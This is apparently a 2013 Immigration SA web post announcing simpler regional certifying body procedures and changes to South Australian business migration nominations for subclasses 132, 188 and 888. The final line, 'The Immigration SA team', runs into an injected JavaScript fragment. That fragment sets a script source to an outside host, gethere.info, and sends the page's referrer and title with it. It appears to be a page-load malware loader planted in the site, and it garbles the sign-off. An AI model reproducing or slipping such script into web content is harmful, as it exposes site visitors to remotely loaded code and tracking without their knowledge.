“We’re streamlining the regional certifying body process
The Regional Sponsored Migration Scheme (RSMS) provides South Australian employers with an opportunity to employ skilled people from overseas.
Employers can sponsor skilled migrants if they can demonstrate they are unable to find suitable people in the local labour market.
Our role is to act as the regional certifying body (RCB), which assesses whether an application satisfies migration criteria and provide advice to guide the DIAC decision.
Read more about the RSMS program here.
A recent review has identified the following changes to the RCB application process:
• Removal of peer review – effective immediately
• Simplified assessment questions
• Extensively reduced evidence requirements
• Quicker application process
Most changes will come into effect in August through the online system, making it easier for you to lodge an application.
More details coming soon. Visit our website for more information.
Business migration options in South Australia
Immigration SA offers state nomination to business people who wish to invest or migrate to South Australia. Learn more about business migration here.
We’re making changes to our business migration program
For people wanting to invest in, or migrate to, South Australia the following changes have been made to make it even more attractive:
• Broadening investment options for significant investors
• Lower state application requirements
• Concessions for regional or rural located business and investment
• Streamlined application process
View our business factsheet for more detailed information.
The above changes will apply to South Australian state nomination applications for the following visas:
• Business Talent (subclass 132)
• Business Innovation (subclass 188/888)
• Business Investment (subclass 188/888)
• Significant Investor (subclass 188/888)
For more information visit: www.immi.gov.au
Updates to the online application system
To make it easier for you to lodge an application, changes will come into effect on 1 July, 2013.
Stay up to date
The Immigration SA teams.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Comments are closed.